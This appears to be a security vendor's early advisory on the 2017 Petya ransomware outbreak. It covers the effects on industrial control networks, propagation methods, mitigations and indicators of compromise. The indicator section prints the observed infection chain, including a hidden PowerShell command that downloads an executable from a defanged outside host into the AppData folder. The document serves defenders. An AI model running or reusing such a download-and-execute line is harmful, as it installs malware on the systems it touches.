INITIAL ANALYSIS (1:40pm EDT - 6.27.17) - CHECK BACK FOR UPDATES
A very rapidly propagating ransomware campaign is unfolding today - using ransomware named Petya, it has been hitting networks globally including many across critical infrastructure domains.
The malware is similar to WannaCry but leverages other techniques to propagate and encrypt systems.
Our initial analysis suggests that Petya’s potential impact on ICS networks appears to be more severe than WannaCry due to the following:
- Impact on ICS Windows machines: Petya does not encrypt files one by one per a matching extension list, but encrypts the master file table (MFT) so that the file system is not accessible-effectively bricking the machine.
This means that any infected HMI would be locked immediately. While this would not directly impact the underlying process, it would deprive all visibility and monitoring capabilities which would lead in most to all cases to shut down. The OT network would have to stay in manual mode until recovery of the infected Window endpoints. Further, other SCADA components e.g., historians, backup servers and engineering stations would also be impacted.
- Propagation: Petya’s propagation capabilities surpass those of WanaCry, as it leverages the user’s privilege to propagate throughout the network (using PSexec). It also utilizes WMI as a propagation vector.
Permanent mitigation steps are similar to WannaCry.
- Patch the following CVEs
- This will protect against only one of the prorogation vectors (SMB) and HTA.
Additional Protection and Recovery Steps:
- Block SMB & WMI port 135, 139, 445,1024-1035 TCP - if possible
- NOTE: Some ICS software relies on these services so this can impact operations.
- Customers can use the Claroty Platform to determine if their current ICS environments are leveraging these ports/protocols.
- Block execution of .exe within %AppData% and %Temp% as a temporary measure to avoid infection until other mitigation steps can be taken. This may cause issues – for example it will impact installers, but provides temporary relief until other mitigation steps can be taken.
- Check logs for IOCs below
- If infected:
- Try to avoid reboot. Shutdown –a to abort the shutdown and preserve a copy of the MFT table from memory for recovery. (cmd /k shutdown -a)
- Try not to format the encrypted systems but rather get its image for use in recovery steps.
Indicators of Compromise (IOC)
File Name Order-20062017.doc (actually RTF with CVE-2017-0199)
MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
File Size 6215 bytes
File Type Rich Text Format data
h11p://22.214.171.124/myguy.xls (actually HTA)
File Name myguy.xls
MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
File Size 13893 bytes
File Type Zip archive data
mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
10807.exe %APPDATA%\10807.exe" " (PID: 3096)
File Name BCA9D6.exe
MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
File Size 275968 bytes
Communicates to: 126.96.36.199 80